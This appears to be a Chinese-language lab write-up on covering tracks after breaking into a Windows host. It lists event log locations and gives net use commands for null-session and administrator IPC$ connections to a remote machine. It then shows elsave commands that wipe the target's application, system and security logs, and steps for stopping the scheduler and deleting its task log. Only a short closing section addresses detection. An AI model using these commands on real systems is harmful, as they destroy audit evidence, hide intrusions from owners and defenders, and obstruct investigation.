elsave擦屁股

一.系统日志

系统日志是记录系统中硬件、软件和系统问题的信息，同时还可以监视系统中发生的事件。用户可以通过它来检查错误发生的原因，或者寻找受到攻击时攻击者留下的痕迹。

系统日志包括系统日志、应用程序日志和安全日志

一般来说，只要没有更改过，这些文件存在默认位置

系统日志：C:\WINDOWS\System32\config\SecEvent.Evt

应用程序日志：C:\WINDOWS\system32\config\AppEvent.Evt

安全日志：C:\WINDOWS\System32\config\SecEvent.Evt

 

其他记录计算机行为的日志：

 DNS日志：%systemroot%\system32\config\DnsEvent.EVT；

Internet信息服务FTP日志：%systemroot%\system32\logfiles\msftpsvc1\

Internet信息服务WWW日志：%systemroot%\system32\logfiles\w3svc1\

 Scheduler计划任务服务日志：%systemroot%\Tasks\schedlgu.txt，由于系统屏蔽的原因，只能在命令行下查看。

 

二.日志查看

查看系统日志方法:开始→设置→控制面板→管理工具 中找到的“事件查看器”

查看对方详细：

 

对方日志存放文件路径

 

 

 

三.清除日志

 查看IP：

ipconfig

 

连接对方：

net   use    \\对方IP地址\ipc$  “”    /user:""                                 与远程主机建立空管连接

net   use    \\对方IP地址\ipc$    “密码”     /user:“Administrator”   以管理员身份登录远程主机

net  use  \ \IP地址\ipc$ /delete    断开连接

 

擦屁股：

elsave工具：

elsave.exe -s \\对方ip -l "application" -C        清除目标系统的应用程序日志

elsave.exe -s \\对方IP -l "system" -C             清除目标系统的系统日志

elsave.exe -s \\对方IP -l "security" -C            清除目标系统的安全日志

 

在自己电脑上也擦擦：

删除计划任务日志

1. 进入日志所在文件夹下（%systemroot%\Tasks）
2. net stop schedule   停止服务（因为程序使用目标删除文件，被保护了)
3. del "*.*"

 

 

 查看对方IP

 

 

我的主机已经安装好elsave工具

 

自己电脑连接对方：

 

 解决：本机上设置环境变量

 

 查看elsave问题解决成功没（没有出现不是内部或者外部就成功了，输入这个主要原因是命令短）

 成功入侵

 

执行删除：

 

中途跑到对方电脑查看删除成功没

 

 继续删除：

 

 

 

删除计划任务日志

在我方电脑上删除

 

 

 

 

 1）还有哪些途径可以发现网络中存在的攻击或者入侵。

漏洞扫描、入侵检测技术

注意电脑是否有异常活动：

• 电脑密码失效。
• 电脑设置出现并非由你本人做的巨大改变。
• 文件内容被更改。
• 有些外部设备在你没有使用的情况下似乎被打开过，比如摄像头、麦克风或全球定位导航系统。

 

2）清理日志能否把所有的痕迹都清理干净。

不能